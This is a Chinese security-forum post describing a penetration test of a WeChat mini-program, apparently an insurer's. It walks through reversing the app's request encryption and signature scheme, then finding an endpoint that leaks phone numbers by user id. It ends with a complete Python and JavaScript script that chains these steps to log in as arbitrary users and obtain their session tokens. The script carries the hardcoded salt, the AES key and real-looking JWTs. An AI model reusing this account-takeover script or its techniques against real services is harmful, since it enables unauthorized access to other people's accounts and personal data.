问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
死磕某小程序
渗透测试
死磕某小程序
死磕某小程序 ====== 前言0x00 ------ 最近无聊挖洞,发现一个小程序防护做的非常严,但是我就要死磕他 开始0x01 ------ 抓包环境 and 小程序逆向(忽略) 看看我的 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-5d63968216ead168054b386221a08425653199ce.png) 抓个登入包 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-00e254a6d46b84e61c98ac35b31ee49a580e6349.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-3327e831eb1c6a4150af236339021790b86bb80b.png) 加密了,翻翻源码 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-bc337e37dd48a6d519a635caba431dfd49ce6d49.png) 是Encrypt函数加密的 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-b7d92959c4e744f5de6e52082b451df250a07f50.png) key是wx.getStorageSync("key");获得的 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-5f86aab2041ba2d40642c4c430b3ed8e3039a2dd.png) key是g(e)获得的 看一下什么东西调用了getKeys函数 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-a9d73cd5b67d779e07575a674341d53cea28531b.png) 是某个请求包的返回包中的参数nonFixedSax和fixedSax ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-978f8ff48c7cc36bff35173cce26ea1c7241fa13.png) 小伙子挺会藏的呀,我怀疑我在打ctf 获得key后走了个g函数 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-6989b896134b1079f4147d894475abfe37403a9d.png) g函数就是个一个加密函数 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-140701b005893dd9fb34094647124be5077a00d4.png) 获得密钥试试 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-b46c27f6f4261f1b8fb0d1318ac00c61ee1d7a96.png) 可以解密 然后尝试修改id看看可不可以登入到别人的账号上面 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-dd5bb452a57e5a74abfb9de8372c95e2b3ea1c26.png) 发现请求过期,应该是sign搞的鬼 他先添加了两个参数saltValue和timestamp当前时间戳 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-1b376bf0e9f6589da21894b3630dccb1aca034f1.png) 然后进行了排序首字母大小写排序 类似于这样 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-a253a4cb506eb3286d67974dfa75871446daa5dd.png) 然后??? 我见过很多aes加密的js 第一次见到这样加密的,没有密钥貌似只是16进制了一下,然后大写md5一下 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-d6c1cbb3fa63ead31f5201fe17cc4d9691b91ae3.png) 写一下js构造了一个js脚本 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-8559ec3d0ac246b9e1e01e025ab8d24ed39a1d35.png) 然后放到python中,js我实在不熟 使用execjs调用js函数 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-e82311019c46d5c2bfe75128f9f65fc1baee1a32.png) 这样sign和timestamp就搞定了 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-38124274c8c897f8a408f72f37fb1e43a1db1e04.png) 不行我测试了一会儿发现是验证了userid和手机号的一致性 就需要找到一个userid查询到手机号的接口 我直接爆破 js找到接口 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-f28426eb03b90bf7dbd070f5c06d8b0b18a8942e.png) 搞成list,函数就填几个可能的参数比如userid和id什么的 然后python梭哈requests配置一下proxies到burp ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-739184f530ea38d116c29b429cd34f8efabf6abd.png) burp查看结果 找到了一个接口可以通过id来查询到手机号 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-026a01d94c86b09f05beb9b19a2868089595c763.png) 接下来有了userid和手机号 手机号aes加密 然后构造脚本 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-a2c0248b5b1ab9c1f1d57089c3a9fb56642f746c.png) 获得token burp替换token尝试登入 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-91eaf3f9fe46566d3fc4bc54b1735ff97fb82f0d.png) 刷新小程序 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-02802cc5d859aa6d68faf102f78f6534bc884c69.png) 登入成功 开始构造脚本 userid(sigin,timestamp)获得手机号--> 手机号aes加密+userid(sigin,timestamp)获得token burp替换token完成登入 ```php import execjs import requests import json import binascii from Crypto.Cipher import AES import base64 from Crypto.Util.Padding import pad, unpad md5\_js\=""" ...... function AES\_Encrypt(word) { var srcs = CryptoJS.enc.Utf8.parse(word); //console.log(srcs); var aaa=CryptoJS.enc.Hex.stringify(srcs); return aaa.toString(); } {1} function yierjiami(ra) { {1} const jsonStr = ra; {1} const jsonObj = JSON.parse(jsonStr); jsonObj.saltValue = "c3Kx$0i67sds#"; jsonObj.timestamp = Date.now().toString(); //jsonObj.timestamp = "1703606967481" {1} const sortedJsonObj = sortObjectKeys(jsonObj); const sortedJsonStr = JSON.stringify(sortedJsonObj); {1} console.log(sortedJsonStr); var aaa=AES\_Encrypt(sortedJsonStr); {1} return \[r(aaa).toUpperCase(),jsonObj.timestamp\]; {1} } """ def aes\_ecb\_encrypt\_hex(plaintext, key): cipher \= AES.new(key, AES.MODE\_ECB) padded\_plaintext \= pad(plaintext.encode(), AES.block\_size) ciphertext \= cipher.encrypt(padded\_plaintext) return binascii.hexlify(ciphertext).decode() id\=111 content \= '{"id":"%s"}'%(id) ctx \= execjs.compile(md5\_js) sign,time \= ctx.call('yierjiami', content) url \= "https://xxx.xxx.com.cn/Pacificlife/myConsumer/detail" headers \= { "syscode": "TXQMP", "charset": "utf-8", "identify": "e4750356-9f8e-4a63-bdc3-80aca36699b6", "sign": sign, "User-Agent": "Mozilla/5.0 (Linux; Android 10; Pixel XL Build/QP1A.191005.007.A3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/116.0.0.0 Mobile Safari/537.36 XWEB/1160027 MMWEBSDK/20230805 MMWEBID/2433 MicroMessenger/8.0.42.2460(0x28002A58) WeChat/arm64 Weixin NetType/WIFI Language/zh\_CN ABI/arm64 MiniProgramEnv/android", "content-type": "application/json", "token": "eyJhbGciOiJIUzUxMiJ9.eyJjb25zdW1lcklkIjoxMjEsImNyZWF0ZWQiOjE3MDM2MTg3OTk4MTl9.goZ0iMAXuBhNk6GOwDWmHULU\_oO5HI6bv3YB0DqxJzTGvt5PUzGmo\_AXTkVjUMZRe66WCl8\_ZLCh41UNahis3w", "Accept-Encoding": "gzip, deflate", "timestamp": time } response \= requests.get(url, json.loads(content), headers\=headers,verify\=False) re1\=json.loads(response.text) try: phone\=re1\['data'\]\['secPhone'\] print(phone) if(phone\==None): print("userid没绑定手机号登入失败") exit() except: print("没手机号登入失败") exit() key\_hex \= b'3631475463441074' plaintext\="{}".format(phone) ciphertext \= aes\_ecb\_encrypt\_hex(plaintext, key\_hex) print(ciphertext) content \= '{"id":"%s","phone":"%s","name":"","salesCode":"","password":"","type":"1"}'%(id,ciphertext) ctx \= execjs.compile(md5\_js) sign,time \= ctx.call('yierjiami', content) url \= "https://xxx.xxx.com.cn/Pacificlife/consumer/login" headers \= { "syscode": "TXQMP", "charset": "utf-8", "identify": "e4750356-9f8e-4a63-bdc3-80aca36699b6", "sign": sign, "User-Agent": "Mozilla/5.0 (Linux; Android 10; Pixel XL Build/QP1A.191005.007.A3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/116.0.0.0 Mobile Safari/537.36 XWEB/1160027 MMWEBSDK/20230805 MMWEBID/2433 MicroMessenger/8.0.42.2460(0x28002A58) WeChat/arm64 Weixin NetType/WIFI Language/zh\_CN ABI/arm64 MiniProgramEnv/android", "content-type": "application/json", "Accept-Encoding": "gzip, deflate", "token": "eyJhbGciOiJIUzUxMiJ9.eyJjb25zdW1lcklkIjoyNDIwMzIyLCJjcmVhdGVkIjoxNzAzNTk4Nzg2MjMzfQ.bnLooesbfQ6ikCJ7WUAuPWFstAD4d\_SZGq-Kijln2\_QPKJC0rrxf7lKzz12nCmxnAX5r3DYbSBP7jO1RwnndaQ", "timestamp": time } #response = requests.get(url, params, headers=headers,proxies=proxies,verify=False) response \= requests.post(url, data\=json.dumps(json.loads(content)), headers\=headers,verify\=False) re2\=json.loads(response.text) print("手机号:{}\\ntoken:{}\\n".format(phone,re2\['data'\]\['token'\])) ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-7eac702b72d409b30de71439cace2e9a19a17406.png) 转载于:yier的博客
发表于 2024-05-08 14:13:23
阅读 ( 5267 )
分类:
渗透测试
10 推荐
收藏
3 条评论
捐维藏
2024-07-29 14:02
大佬牛逼
请先
登录
后评论
asddad
2024-08-31 10:37
牛而逼之
请先
登录
后评论
uf9n1x
2024-09-14 17:50
牛牛牛
请先
登录
后评论
请先
登录
后评论
xhys
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!